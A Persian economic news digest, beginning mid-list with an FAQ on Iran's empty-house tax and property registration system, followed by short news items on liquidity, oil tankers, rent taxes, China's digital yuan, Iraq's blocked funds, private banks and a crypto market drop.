۴- خانه به نام مالک است، اما مستاجر در آن سکونت دارد، چگونه این مورد ثبت شود؟

در قسمت افزودن ملک بعد از ورود اطلاعات ملک، در قسمت اطلاعات سکونت، گزینه “شخص دیگری ساکن است. ” را انتخاب کرده و اطلاعات مستاجر در آن وارد شود.

۵- در سامانه نشان می دهد خانه من خالیست، اما خالی نیست، چه اقدامی باید انجام شود؟

وضعیت اقامت ملک خود را با انتخاب گزینه ثبت یا تغییر ساکن مشخص کنید.

۶-ملک فروخته شده یا ساکن دیگری در ملک سکونت دارد، اما کد رهگیری ندارند. برای ثبت آن چه کنند؟

وارد کردن کد رهگیری برای ثبت فروش یا سکونت ملک الزامی نیست.

۷- در ثبت ملک، به طور اشتباه اطلاعات نادرستی وارد شده و ثبت نهایی شده، برای ویرایش آن چه باید کرد؟

امکان ویرایش اطلاعات بعد از ثبت نهایی وجود ندارد. لازم است در وارد کردن اطلاعات، دقت لازم لحاظ شود.

۸- منظور از اقامتگاه اصلی و فرعی چیست؟

اقامتگاه اصلی اقامتگاهی است که در آن زندگی می شود و اقامتگاه فرعی، اقامتگاه دوم خانواده است.

۹- اولین بار است که می خواهند وارد سامانه شوند(یا رمز عبور فراموش شده)، در صفحه سماوا می خواهند کد ملی را وارد کنند، اما کد ملی وارد نمی شود. در این باره چکار باید کرد؟

اطمینان حاصل کنید از مرورگرهای به روز Google Chrome یا Mozilla Firefox استفاده می شود.

۱۰- چگونه مشخصات ملک را در سامانه اضافه کرد؟

در قسمت املاک تحت مالکیت، روی گزینه افزودن ملک کلیک کرده و مشخصات آن را ثبت کنید.

۱۱_ وضعیت سکونت ملک تغییر کرده است، برای ثبت آن چه اقدامی باید انجام داد؟

در قسمت املاک تحت مالکیت، در کنار ردیف ملک خود روی گزینه ثبت یا تغییر ساکن کلیک کرده و وضعیت جدید سکونت ملک خود را ثبت کنید.

۱۲- اقامتگاه فرد در سامانه مشاده نمی شود، چه کار باید کرد؟

در قسمت اقامتگاه ها روی گزینه افزودن اقامتگاه کلیک کرده و مشخصات آن ثبت شود.

۱۳- می خواهند اقامتگاه خود را تغییر دهند. چگونه اقامتگاه قبلی خود را حذف کنند؟

در قسمت اقامتگاه ها در کنار ردیف اقامتگاه قبلی خود روی گزینه اتمام سکونت کلیک کرده و تاریخ پایان سکونت در آن را درج کنید. سپس مشخصات اقامتگاه جدید ثبت شود.

۱۴- آیا واحد مسکونی بایستی ۱۲۰ روز به صورت متوالی خالی باشد یا اینکه خالی بودن به صورت غیرمتوالی نیز مشمول مالیات خواهد بود؟

در صورتی که ملک به مدت ۱۲۰ روز غیر متوالی در طول سال مالیاتی خالی باشد، باز هم مشمول مالیات بر خانه خالی خواهد شد.

۱۵- در خصوص افرادی که بیش از ۵ واحد مسکونی خالی دارند، آیا بایستی تمامی املاک در یک شهر واقع باشند؟

مهم نیست که واحدهای مسکونی در یک شهر باشد یا در شهرهای مختلف، به هر حال در صورتی که مالک بیش از ۵ واحد مسکونی خالی باشد، مشمول مالیات دو برابری می شود.

۱۶- اگر ملکی در طول سال، ۱۲۰ روز خالی بماند، اما مالک آن را فروخته باشد، به طوری که بخشی از ۱۲۰ روز زمان خالی ماندن، در اختیار مالک اول و بقیه در اختیار مالک دوم باشد، در این صورت آیا مشمول مالیات می شود؟ اگر بله چه کسی بایستی مالیات را پرداخت کند؟

اگر ۱۲۰ روز از زمان خالی بودن در اختیار یک مالک باشد، مشمول مالیات می شود.

۱۷- چنانچه ملکی به دلیل فرسودگی قابلیت اجاره دادن نداشته باشد، آیا مشمول مالیات خانه خالی می شود؟

فرسودگی، ملاک عدم شمولیت در مالیات نیست و ملک مشمول مالیات خانه خالی می شود.

۱۸- پس از اینکه مالک، اخطار مربوط به مشمول مالیات خانه خالی بودن را دریافت کرد، چه کاری باید انجام دهد؟

به سامانه جهت خوداظهاری مراجعه کند.

۱۹- دو واحد مسکونی که دارای سند مجزا هستند و تجمیع شده و توسط یک خانوار استفاده می‌ شوند، آیا بایستی به صورت مجزا در سامانه ثبت شوند و خانه خالی تلقی می شود؟

بله، بایستی به صورت مجزا ثبت شوند و اگر یکی از املاک، اقامتگاه دوم تلقی نشود، مشمول مالیات خانه خالی می شود.

۲۰- حکم ملکی که خریداری شده اما هنوز به مالک جدید تحویل نشده و در فاصله زمان بین خرید تا تحویل نهایی خالی بوده، چیست؟

اگر به میزان ۱۲۰ روز خالی باشد و در اختیار یک مالک باشد، مشمول مالیات خانه خالی می شود.

۲۱- برای معافیت واحدهای وقفی که مشمول مالیات نیست، چه مدارکی موردنیاز است؟

ملاک، استعلام از سازمان اوقاف و امور خیریه است.

۲۲- آیا واحدهای مسکونی در شهرهای زیر ۱۰۰ هزار نفر جمعیت مشمول مالیات خانه خالی می شوند؟

خیر، مشمول مالیات نمی شوند، اما چنانچه اطلاعات آنها در سامانه اظهار نشوند، مشمول جریمه خواهند شد.

۲۳- در چه صورت واحدهای مسکونی مشمول جریمه مربوط به عدم ثبت ملک می شوند و این جریمه در شهرهای کمتر و بیشتر از یکصد هزار نفر جمعیت به چه صورت خواهد بود؟

واحدهای مسکونی واقع در کلیه شهرهای زیر ۱۰۰ هزار نفر جمعیت و روستاهای کشور که هریک از مالک یا بهره‌بردار آن‌ها در سامانه ملی املاک و اسکان کشور ثبت نشده باشد در حکم خانه‌ خالی تلقی شده و مشمول جریمه‌ای معادل ۲۰ درصد مالیات سال اول موضوع ماده (۵۴ مکرر) قانون مالیات های مستقیم و واحدهای مسکونی واقع در شهرهای بالای یکصدهزار نفر جمعیت که هریک از مالک یا بهره‌بردار آن‌ها در سامانه ملی املاک و اسکان کشور ثبت نشده باشد، در حکم خانه خالی موضوع ماده (۵۴ مکرر) این قانون محسوب می‌شوند.

۲۴- در صورتی که بهره‌بردار، اطلاعات ملک را در سامانه درج نکند، تکلیف مالک چیست؟

می تواند با درج کد رهگیری اجاره نامه و یا شناسه سند و رمز تصدیق اجاره‌نامه رسمی خود از شمول مالیات خارج شود.

۲۵- اگر محل سکونت فرد تغییر کرد، چه کاری باید انجام دهد؟

ظرف مدت حداکثر یک ماه بایستی اطلاعات محل سکونت جدید در سامانه ثبت کند.

۲۶- مهلت خوداظهاری برای اشخاص حقیقی و حقوقی چه مدت است؟

اشخاص حقیقی و حقوقی از زمان اعلام رسمی خوداظهاری حداکثر دو ماه برای درج اطلاعات فرصت دارند.

۲۷- مالک اقامتگاه اصلی یکی از اعضای خانوار (مثلا همسر یا یکی از فرزندان سرپرست خانوار) است. نحوه ثبت ملک چگونه است؟

در این حالت سرپرست خانوار لازم است در قسمت مالکیت ملک، آن عضو خانوار را به عنوان مالک معرفی کند. این عضو خانوار نیز لازم است به صورت جداگانه وارد سامانه شده و ملک خود را ثبت کند. دقت شود در هنگام ثبت ملک لازم است وی در قسمت اطلاعات سکونت گزینه “خودم ساکن هستم” را انتخاب کند.

۲۸-خانهای خریده شده، اما هنوز سند به نام مالک جدید صادر نشده، چگونه ملک باید ثبت شود؟

در این موارد لازم است در قسمت نوع سند، گزینه “عادی” انتخاب شود.

لزوم درج اطلاعات اقامت و مالکیت تمامی اشخاص در سامانه ملی املاک و اسکان کشور

به گزارش ایرنا، مطابق قانون اصلاح موادی از قانون مالیاتهای مستقیم مصوب ۵ آذرماه ۱۳۹۹، هر واحد مسکونی واقع در کلیه شهرهای بالای یکصدهزارنفر جمعیت که به استناد سامانه ملی املاک و اسکان کشور موضوع تبصره ۷ ماده ۱۶۹ مکرر این قانون، در هر سال مالیاتی در مجموع بیش از ۱۲۰ روز ساکن یا کاربر نداشته باشد به عنوان خانه خالی شناسایی شده و به ازای هرماه بیش از زمان مذکور، بدون لحاظ معافیت تبصره ۱۱ ماده ۵۳ این قانون ماهانه مشمول مالیاتی بر مبنای مالیات بر درآمد اجاره به شرح ضرایب زیر می شود:

سال اول، معادل ۶ برابر مالیات متعلقه

سال دوم، معادل ۱۲ برابر مالیات متعلقه

سال سوم به بعد، معادل ۱۸ برابر مالیات متعلقه

واحدهای نوساز پس از ۱۲ ماه و در طرح (پروژه) های انبوه سازی پس از هجده ماه از زمان صدور گوهی اتمام عملیات ساختمانی، مشمول مالیات موضوع این ماده می شوند.

مالکان واحدهای مسکونی تمام کشور اعم از شهری و روستایی موظفند اطلاعات املاک تحت تملک خود را با تعیین نوع بهره برداری، حداکثر ظرف مدت دوماه پس از انتشار دستورالعمل مربوطه، در سامانه ملی املاک و اسکان کشور ثبت کنند. ثبت واحدهای مسکونی دارای جهات امنیتی، براساس دستورالعمل مصوب شورای عالی امنیت ملی انجام می شود.

پس از پایان مهلت خوداظهاری موضوع تبصره (۱) این ماده، دستگاه‌های اجرایی مکلفند خدمات خود ازقبیل افتتاح حساب بانکی و صدور دسته چک، خدمات ناشی از اعمال سیاست های حمایتی، یارانه ای و کمک معیشتی، تعویض پلاک خودرو، فروش انشعاب آب، برق، تلفن و گازطبیعی، ارسال اسناد و مدارک مانند گواهینامه، گذرنامه، مدارک خودرو، اخطاریه، ابلاغیه، ثبت نام مدارس در منطقه محل اقامت، استحقاق دریافت خوابگاه دانشجویی و امثال آن را صرفاً با اخذ کدملی و براساس کدپستی یا شرح نشانی یکتای درج شده مربوط به اقامتگاه اصلی آنان در سامانه املاک و اسکان کشور ارائه کنند.

همچنین حداکثر ظرف مدت شش ماه پس از لازم الاجرا شدن این تبصره، تمام ارائه دهندگان خدمات عمومی از قبیل آب و فاضل

 

۷ : عامل افزایش نقدینگی در کشور چیست؟

افزایش بی‌رویه نقدینگی پیوسته یکی از چالش‌های کشور بوده و اثراتی منفی بر اقتصاد ایران برجای گذاشته است. اما پرسش این است که چه عواملی در بروز آن نقش تعیین کننده‌ دارند؟ چه مقدار از رشد نقدینگی ناشی از مشکلات ساختاری است و چه حد ناشی از خطاهای مدیریتی است؟

حجم و میزان رشد نقدینگی یکی از مواردی است که به عنوان مبنایی برای ارزیابی عملکرد مدیران اقتصادی به کار می‌رود. با نزدیک شدن به پایان کار دولت تدبیر و امید این سوال مطرح است که عملکرد این دولت در مدیریت نقدینگی چگونه بوده است؟

اقتصاد بدون رشد نقدینگی، دست‌کم در عمل معنا ندارد. وجود این پدیده در اقتصاد ایران نیز امری غیرقابل انکار و طبیعی است. موضوع مهم، اما کمیت و کیفیت نقدینگی است. مقدار نقدینگی نباید آن‌قدر بالا باشد که نتوان ارتباطی منطقی بین آن و شاخص‌های کلان اقتصای همچون «نرخ رشد اقتصادی» برقرار کرد.

بنابراین، دولت‌ها سعی می‌کنند رشد نقدینگی را کنترل و آن را به مسیر درست هدایت کنند. یعنی تلاش دولتمردان این است که کیفیت نقدینگی را کنترل کنند. هر دولتی که بتواند رشد نقدینگی را کنترل و آن را از روندی قابل قبول برخوردار و مهمتر اینکه به سمت تولید هدایت کند، می‌تواند پیامدهای مثبتی از نظر رشد اقتصادی، افزایش اشتغال و کاهش تورم را برای کشور رقم بزند.

با این تفسیر می‌توان گفت که نقدینگی به‌خودی خود پدیده‌ای منفی نیست و می‌تواند گردش اقتصادی را موجب شود. در صورتی که حجم نقدینگی از رشد اقتصادی بیشتر باشد، تورم و افزایش قیمت‌ها از مهمترین آثار منفی آن خواهد بود. تورم نیز تولید را تحت تاثیر قرار می‌دهد.

در جدول زیر که از سوی بانک مرکزی منتشر شده، سهم نقدینگی ایجاد شده در ۸۷ ماه دولت‌های هفتم و هشتم نسبت به کل نقدینگی ایجاد شده معادل ۸۰.۴ درصد، در دولت‌های نهم و دهم معادل ۸۱.۴ درصد و در دولت‌های یازدهم و دوازدهم نیز معادل ۸۳.۴ درصد بوده است.

سرخط مهم ترین اخبار اقتصادی هفته، منتهی به ۰۲ اردیبهشت ماه ۱۴۰۰

این آمار و ارقام نشان می‌دهد که رشد نقدینگی در کشور بالا است. تفاوت بین دوره‌های مختلف خیلی زیاد نیست. یعنی در همه دولت‌ها این رشد از استانداردهای جهانی و به‌ویژه در کشورهای توسعه یافته فاصله زیادی دارد. بنابراین، مشکل نقدینگی در کشور به احتمال زیاد قبل از اینکه مرتبط با این یا آن دولت باشد ناشی از مسائل و چالش‌های ساختاری است.

بخش قابل توجهی از رشد نقدینگی به نظام بانکی ایران باز می‌گردد. به همین خاطر است که از صدر تا ذیل مسوولان کشور بر ضرورت  اصلاح نظام بانکی تاکید فراوان دارند. بسیاری از بانک‌ها، از طریق شرکت‌های زیرمجموعه‌ خود وارد فعالیت‌های سفته‌بازانه می‌شوند.

بانک‌ها به‌جای تامین سرمایه مورد نیاز بنگاه‌های اقتصادی و کمک به تولید، به دلایلی برای جبران بدهی‌ها یا پرداخت سود سپرده‌گذاران خود وارد بازارهای مختلف مانند ارز، سکه و مسکن می‌شوند. یعنی بانک‌ها به عنوان تامین‌کنندگان اصلی نقدینگی بخش تولید با ورود به سفته‌بازی جریان نقدینگی را به جای تولید به سمت و سوی دیگری هدایت می‌کنند. این امر نه فقط بر افزایش نقدینگی اثر دارد بلکه نوسانات شدید و نابسامانی‌های قابل توجهی را در بازارهای مذکور موجب می‌شود. از این رو، نظارت بر عملکرد نظام بانکی و جلوگیری از انحراف آن از مسیر و وظیفه‌ اصلی‌شان جزو ضرورت‌های انکار ناپذیر سیاست‌گذاری‌های پولی و بانکی است.

بدون شک مشکلات ساختاری دیگری نیز وجود دارد اما فارغ از این مسائل دو عامل تحریم و بیماری کرونا نیز به چالش نقدینگی در دو سال اخیر دامن زده است. پس از خروج ترامپ از برجام و اعمال تحریم‌های شدید علیه ایران، نه تنها درآمدهای حاصل از صادرات دولت به شدت کاهش یافت و حتی در مقاطعی درآمدهای نفتی به نزدیک صفر رسید، بلکه تولید و به دنبال آن رشد اقتصادی در داخل نیز راه منفی را در بر گرفت.

بدون شک اگر سیاست فشار حداکثری آمریکا و به دنبال آن کاهش شدید صادرات نفت و درآمدهای ارزی نبود ما شاهد رشد نقدینگی کمتری بودیم، زیرا در دوره‌ای که برجام به نتیجه رسید و اقتصاد کشور در مسیر رشد قرار گرفت با رسیدن رشد اقتصادی از منفی ۱.۶ در سال ۱۳۹۴ به ۱۲.۵ درصد در سال ۱۳۹۵ ما شاهد کاهش رشد نقدینگی در این سال بودیم. اما، سال ۱۳۹۷ هم‌زمان با شروه مجدد تحریم‌ها و رسیدن رشد اقتصادی به منفی ۴.۹ درصد رشد نقدینگی ۱۰ درصد بیشتر می‌شود.

بنابراین می‌توان گفت که بالاتر بودن حدود ۲ درصد سهم نقدینگی در ۸۷ ماهه دولت‌های یازدهم و دوازدهم نسبت به دولت‌های قبل ناشی از همین شرایط خاص تحریمی و جنگ اقتصادی از یک طرف و بیماری کرونا از طرف دیگر بوده است.

با همه این تفاسیر نباید از رفع موانع ساختاری و به‌ویژه اصلاح نظام بانکی غافل شد. هر دولتی که بر سر کار باشد باید در کنار کمک به افزایش رشد اقتصادی فکری به حال اصلاح ساختار بانکی کشور نیز بکند. در غیر این صورت رشد نقدینگی همواره به عنوان یکی از چالش‌های اصلی کشور باقی خواهد ماند.

 

۸ : انتظار نفتکش‌ها برای تجارت نفت ایران

همزمان با افزایش صادرات نفت ایران طی دو ماه گذشته، تحلیلگران معتقدند در صورت لغو تحریم‌های نفتی علیه کشور، بازار جهانی نفتکش‌ها با پیامد‌های چشمگیری روبه‌رو خواهد شد.

تعداد زیادی از کشتی‌هایی که در سال‌های اخیر در حال دور زدن تحریم‌ها و فروش غیررسمی نفت ایران بوده‌اند، باید برای اوراق‌شدن روانه گورستان کشتی‌های خارج از رده شوند. بدین ترتیب شاهد رونق گرفتن بازار نفتکش‌ها و کاهش بحران مازاد عرضه و رکود کنونی حاکم بر بازار خواهیم بود.

مؤسسه شیپ بروکر گیبسون، در آخرین گزارش هفتگی خود نوشته است: بایدن این نکته را در کارزار انتخاباتی خود روشن کرده است که تلاش می‌کند با ایران به تفاهم مجدد از طریق بازگشت به توافق هسته‌ای برجام دست یابد. نمایندگان ایران و ایالات متحده، نخستین گام‌های علنی برای مذاکره را در هفته گذشته برداشتند، البته شاهد مذاکره رودرروی دو کشور نبودیم، بلکه آن‌ها در کنار اعضای باقیمانده برجام به گفتگو پرداختند.

کشور‌های شرکت‌کننده در این نشست که در وین برگزار شد، اعلام کردند: گفتگو‌های آن‌ها سازنده بوده است و دور دوم مذاکرات در روز نهم آوریل انجام شد. براساس گزارش شیپ بروکر، هیچ‌کدام از کشور‌های حاضر در این مذاکرات انتظار ندارد که به توافق سریعی با تهران دست یابند. به نظر می‌رسد آن‌ها به چند ماه زمان برای دستیابی به یک قرارداد جدید نیاز دارند.

ایران خواستار برداشته‌شدن همه تحریم‌هایش از سوی ایالات متحده پیش از بازگشت به تعهدات برجامی خود است، اما امریکایی‌ها معتقدند تهران باید بار دیگر به تعهداتش در چارچوب برجام یا همزمان با لغو تحریم‌ها بازگردد.

نکته مهم این است که توافق احتمالی قدرت‌های جهانی با ایران چه تأثیری بر بازار نفتکش‌ها خواهد داشت؟
با لغو تحریم‌ها، ایران نیاز به نفتکش‌های بیشتری برای صادرات نفت خود خواهد داشت. البته ایران تعداد زیادی نفتکش دارد که اکثر آن‌ها دارای محموله نفتی هستند، اما تا رسیدن به تعادل در این بخش به ماه‌ها زمان نیاز خواهد بود.

موضوع دیگر مورد توجه، تانکر‌هایی هستند که متعلق به ایران نیستند، اما در سال‌های اخیر در جابه جایی نفت ایران مشارکت داشته‌اند. مؤسسه گیبسون اعلام کرده است که ۸درصد از تانکر‌های بسیار بزرگ (VLCC) و ۵درصد ناوگان سوئزمکس دنیا در جابه‌جایی غیرقانونی نفت ایران در سال‌های اخیر فعالیت داشته‌اند. البته این اعداد با در نظرگرفتن نفتکش‌های متعلق به شرکت ملی نفتکش ایران محاسبه شده‌اند.

به هر ترتیب با برداشته‌شدن تحریم‌های ایران، این نفتکش‌ها نمی‌توانند همچون گذشته با کرایه‌هایی بالاتر از نرخ‌های بازار به جابه‌جایی محموله‌های نفت این کشور بپردازند. همچنین به دلیل اینکه اکثر نفتکش‌ها قدیمی یا خارج از رده هستند، تعداد زیادی از آن‌ها روانه یارد‌های اوراق‌کردن کشتی‌ها خواهند شد. این اتفاق، خبری خوب برای سایر نفتکش‌های دنیا خواهد بود.

تخمین‌زده می‌شود که ایران برای صادرات ۲ میلیون بشکه نفت در روز مشابه با میزان صادرات اوایل سال ۲۰۱۸ میلادی، به ۲۵ تانکر بسیار بزرگ و ۲۰ نفتکش سوئز مکس نیاز خواهد داشت.

اگرچه شرکت ملی نفتکش ایران دارای ناوگان بزرگی از نفتکش‌های بسیار بزرگ است، اما در عمل و به دلایل فنی این نفتکش‌ها نمی‌توانند در دوره پساتحریم همه نیاز‌های ایران را تأمین کنند.

در بخش دیگری از گزارش شیپ بروکر می‌خوانیم: در دوره پیشین لغو تحریم‌ها، تخلیه‌شدن محوله‌های نفتکش‌های شرکت ملی نفتکش ایران که عمدتاً با میعانات گازی پر شده بود، به ماه‌ها زمان نیاز داشت. در عین حال، به دلیل اینکه ده‌ها سفارش جدید دریافت شده بود، مدیران صنعت نفت این کشور وادار شدند تا قرارداد‌های زیادی با مالکان نفتکش‌ها برای تحویل سفارش‌های جدید امضا کنند.

 

۹ : پرداخت مالیات بر عهده مالک یا مستاجر؟

طبق شنیده ها بعصی از مالکان در قراردادهای اجاره ای امسال مبلغی را هم به عنوان مالیات به اجاره مستاجران اضافه می‌کنند.

قانون مالیات بر خانه های خالی باعث نگرانی خیلی از مستاجران شده است. جریمه و محدودیت هایی که هم برای مالک و هم مستاجر در نظر گرفته می شود به کنار، حالا هم خبرهایی درباره اضافه شدن رقم مالیات به قرارداد مستاجران شنیده می شود.

گویا برخی از مالکان قصد دارند مالیات ملک خود را به مستاجران منتقل می‌کنند. اگر فشار پرداخت مالیات هم به هزینه‌های مستاجران اضافه شود، وضعیت معیشت این گروه سخت‌تر می‌شود براساس اعلام مرکز آمار میزان اجاره‌بهای مناطق شهری در زمستان ۹۹ نسبت به مدت مشابه سال قبل ۲۸.۹ درصد افزایش یافته است. اما این کار جنبه قانونی دارد؟ براساس قانون مستاجران باید مالیات بر ملکی که اجاره می‌کنند را بپردازند؟

با اینکه هنوز هیچ خبر رسمی در این باره منتشر نشده است، اما بعضی از مستاجران با انتشار پست و توییت به این شایعه ها واکنش نشان داده اند.

یکی از کاربران در باره احتمال انتقال مالیات ملک صاحبخانه به مستاجر نوشته است: حسب شنیده‌ها در قراردادهای اجاره امسال معادل ماهانه مالیات بر املاک به مبلغ اصلی افزوده می‌شود.

صاحبخانه یا مستاجر چه کسی باید مالیات بدهد؟
به گفته رئیس اتحادیه مشاوران املاک در قراردادهای اجاره یک مالیات املاک و مستغلات وجود دارد که برعهده مالک است اما ممکن است براساس توافق بین مستاجر و موجر این مالیات با کسر از اجاره‌بها به مستاجر منتقل شود.

قلی خسروی همجنین درباره ملکی که از قبل مالیات داردبه تجارت نیوز می گوید: در این مورد مالیات بر عهده مالک است اما همچنان به توافق بین فروشنده و خریدار بستگی دارد که تصمیم بگیرند مالیات از مبلغ نهایی که باید خریدار بپردازد کسر شود یا که خود مالک بپردازد.

طبق گفته رئیس اتحادیه مشاوران املاک، مالیات برعهده مالک است و براساس توافق و کسر هزینه مشخص می‌شود که چه کسی پرداخت کند اما برخی از کاربران توئیتر می‌گویند که این موضوع چند سالی هست که به مستاجران تحمیل شده است.

 

۱۰ : چین قصد ندارد یوان دیجیتال را جایگزین دلار کند

رئیس بانک مرکزی چین اعلام کرد بین‌المللی کردن یوان یک روند طبیعی است و هدف این کشور جایگزینی دلار آمریکا یا سایر ارزهای بین‌المللی نیست.

چین به دنبال از بین بردن ترس به وجود آمده در مورد کنار زدن دلار آمریکا به عنوان ارز ذخیره جهان توسط یوان دیجیتال است. این ترس از تلاش‌های بیشتر چین در انتشار یوان دیجیتال ناشی می‌شود.

رئیس بانک مرکزی چین اعلام کرد هدف از بین المللی کردن ارز چین جایگزینی دلار نیست و تلاش‌ها برای ایجاد یک یوان دیجیتال با هدف مصرف داخلی صورت می‌گیرد.

وی گفت:«ما بارها در مورد بین‌المللی کردن یوان گفته‌ایم که این یک روند طبیعی است و هدف ما جایگزینی دلار آمریکا یا سایر ارزهای بین‌المللی نیست. هدف ما دادن حق انتخاب به بازار جهت تسهیل تجارت و سرمایه‌گذاری بین المللی است».

بانک مرکزی چین در حال آزمایش یوان دیجیتال خود در چندین برنامه آزمایشی در سراسر کشور است. گزارشات نشان می‌دهد دولت بایدن به شدت روند رسیدن چین به یوان دیجیتال را تحت کنترل دارد و نگران است این یک تلاش بلندمدت برای جایگزینی دلار باشد.

بانک مرکزی چین: افزایش قیمت بیت کوین باعث بالا رفتن علاقه به یوان دیجیتال می‌شود

بانک مرکزی چین از ۲۰۱۴ بر روی این ارز دیجیتال کار می‌کند و این اقدام آن علاقه به یوان دیجیتال را در میان بانک‌های مرکزی و سیاست‌گذاران افزایش داده است. گسترش ارزهای مجازی این احساس را به وجود آورده که این رقبای پول سنتی می‌توانند عملکرد بخش مالی را تغییر دهند. بانک مرکزی چین اولین بانک مرکزی بزرگ دنیا خواهد بود که یک ارز مجازی راه‌اندازی می‌کند. این بانک استفاده آزمایشی از یوان دیجیتال توسط مصرف کنندگان و کسب و کارها را در ۱۱ شهر در سراسر کشور ممکن می‌سازد.

رئیس بانک مرکزی چین گفت:«هدف از یوان دیجیتال در حال حاضر مصرف داخلی است. قابلیت همکاری با بخش‌های مالی دیگر مسئله پیچیده‌ای است که ما عجله برای رسیدن به یک راه‌حل خاص نداریم. البته در بلند مدت مقدمات استفاده بین مرزی هم آماده خواهد شد».

وی تاکید کرد یوان دیجیتال چین دلار آمریکا را سرنگون نمی‌کند. بانک مرکزی چین استفاده بین مرزی از یوان دیجیتال را در المپیک زمستانی ۲۰۲۲ آغاز می‌کند.

 

۱۱ : خبری مهم از آزادسازی پولهای بلوکه ایران

دبیرکل اتاق بازرگانی مشترک ایران و عراق با تشریح توافق ۱۰ بندی ایران و عراق برای آزاد سازی پول‌های بلوکه شده، گفت: به سرانجام رساندن این روند به حدود یک ماه زمان نیاز دارد تا وضعیت معاملات در شرایط عادی قرار بگیرد.

حمید حسینی با بیان اینکه در اسفندماه سال ۹۹ مسئولان دو کشور در مصاحبه هایی به طور رسمی از پرداخت بدهی ها عراق به ایران خبر دادند، اظهار داشت: این کشور معافیت‌هایی در زمینه بازگشت پول های بلوکه شده ایران دریافت کرده است و می تواند فارغ از تحریم ها بدهی های خود را به ایران پرداخت کند.

دبیرکل اتاق بازرگانی مشترک ایران و عراق با بیان اینکه نماینده ای از سوی ایران با بانک تجارت عراق مذاکره داشته است، خاطرنشان کرد: این بانک اعلام کرد که در حال حاضر تجار ایرانی می توانند با استفاده از پول های بلوکه شده، تجارت خود را انجام دهند.

حسینی با بیان اینکه دستورالعمل ۱۰ گانه ای تبیین شده تا شرکت های ایرانی و عراقی بتوانند با یکدیگر همکاری داشته باشند، تصریح کرد: در این بخشنامه آمده که می توانند از پول های بلوکه شده به صورت یورو، دلار و دینار استفاده کنند و بانک هزینه ای بابت کارمزد آن دریافت نخواهد کرد.

وی با اشاره به سایر شرایط این توافق، افزود: از سوی دیگر شرکت های توانیر و گاز ایران باید شرکت‌های ایرانی را در نامه‌ای معرفی و تایید کنند و همچنین شرکت عراقی طرف معامله در زمینه دارو و غذا باید تخصص و سابقه کار داشته باشد.

دبیرکل اتاق بازرگانی مشترک ایران و عراق خاطرنشان کرد: بر اساس این دستورالعمل شرکت ایرانی کالاهای مورد نظر خود را از عراق خریداری کرده و زمانی که کالا وارد آب های ایران شود ۹۰ درصد و در زمان تخلیه بار ۱۰ درصد باقی مانده از پول های ایران در بانک عراق آزاد خواهد شد.

به گفته حسینی، طبق بخش دیگری از این توافق، در صورت خرید اقلام کشاورزی و دارویی، تایید وزارت کشاورزی و دارویی عراق الزامی است و بعد از استعلام مالیاتی کالا قابل تبادل می شود.

وی با بیان اینکه این روند نیاز به مذاکره با شرکت های عراقی دارد، خاطرنشان کرد: تشویق آنها برای تجارت با ایران با رعایت این دستورالعمل ها سخت شده است و نیاز به زمان دارد اما در حال حاضر به لحاظ پرداخت بانکی و آزاد سازی پول های بلوکه شده ایران، مشکلی وجود ندارد.

دبیرکل اتاق بازرگانی مشترک ایران و عراق با تاکید بر اینکه در تلاش هستیم تا شرکت های عراقی را وارد این روند کنیم، اظهار داشت: در صورتی که بخواهیم پول های ایران را در تجارت با شرکت‌هایی غیر از شرکت های عراقی آزاد کنیم نیاز است که شرکت مورد نظر در بانک تجارت عراق حساب باز کند تا بتوان هزینه کالای خریداری شده را به حساب شرکت خارجی پرداخت کنیم.

حسینی تاکید کرد: به سرانجام رساندن این روند به حدود یک ماه زمان نیاز دارد تا وضعیت معاملات در شرایط عادی قرار بگیرد و به زودی در این زمینه خبرهای خوبی خواهیم داشت.

کارنامه تجارت ایران در مجموع ۱۱ ماه سال ۹۹، ۱۳۴ میلیون تن کالا به ارزش ۶۵ میلیارد و ۵۰۰ میلیون دلار بوده که سهم صادرات ۱۰۳ میلیون و ۹۰ هزار تن به ارزش ۳۱ میلیارد و ۱۹۸میلیون دلار و سهم واردات ۳۰ میلیون و ۸۱۸ هزار تن کالا به ارزش ۳۴ میلیارد و ۳۲۱ میلیون دلار بوده است.

از کل صادرات کشور، عراق با یک میلیون و ۵۷۰ هزار تن به ارزش ۴۷۷ میلیون دلار در جایگاه دومین مقصد صادراتی کشور در ۱۱ ماهه سال ۹۹ قرار گرفت.

به گفته «عبدالناصر همتی» رییس کل بانک مرکزی، حجم منابع ارزی ایران در عراق حدود پنج میلیارد دلار است.

 

۱۲ : بررسی پرونده بانکهای خصوصی در هیات تحقیق‌وتفحص مجلس

نایب رئیس کمیسیون اقتصادی مجلس با انتقاد از وضعیت فعلی بانکهای خصوصی گفت: منتظر اخبار هیات تحقیق‌وتفحص مجلس از بانکهای خصوصی باشید.

احسان خاندوزی؛ نایب رئیس کمیسیون اقتصادی مجلس شورای اسلامی با انتقاد از رویه بانکهای خصوصی گفت: وقتی صحبت از برخورد سرمایه‌سالار و طبقاتی با ‎واکسن‌کرونا است، باید از آقای وزیر بهداشت پرسید بیمارستان ۳هزار تختی که متعلق به یک بانک خصوصی است امروز چه وضعی دارد؟

وی با تاکید بر نظارت وبررسی وضعیت بانکهای خصوصی از سوی نمایندگان مجلس افزود: منتظر اخبار هیات تحقیق‌وتفحص مجلس از بانکهای خصوصی باشید.

 

۱۳ : واکنش جالب مدیرعامل صرافی باینانس به ریزش ارزهای دیجیتالی

پس از ریزش شدید بازار ارزهای دیجیتالی که به کاهش حدود ۲۰۰ میلیارد دلاری ارزش بازار نیز منجر شد، چانگ پنگ- مدیرعامل صرافی باینانس- در پیامی توییتری نوشت: می خواهند شما را از اتوبوس پیاده کنند!

آقای پنگ گفته است که این توییت وی یک توصیه سرمایه گذاری محسوب نمی شود و معامله گران باید اقدامات احتیاطی در پیش گیرند که جلوی زیان های سنگین آن ها در بازار را بگیرد چرا که این زیان ها قابل جبران نخواهند بود.

چانگ پنگ همچنین در اظهار نظر جداگانه ای اعلام کرد ۴۰ درصد کل ارز دیجیتالی باینانس کوین در اختیار صرافی باقی خواهد ماند و هیچ کدام از آن ها فروخته نخواهد شد چرا که قرار است طی فرآیند توکن سوزی این رمزارزها از بین بروند. (به قیمت کنونی این ارزها چیزی در حدود ۳۷ میلیارد دلار ارزش دارند!)

ارزهای دیجیتالی در ساعت های اخیر ریزش کم سابقه ای را تجربه می کنند که برخی تحلیلگران دلیل آن را اخلال موقت در فعالیت استخراج کنندگان چینی و برخی نیز آن را مرتبط با توییت یک حساب کاربری می دانند که از احتمال آغاز تحقیقات قضایی آمریکا در خصوص پولشویی با استفاده از ارزهای دیجیتالی خبر داده بود.

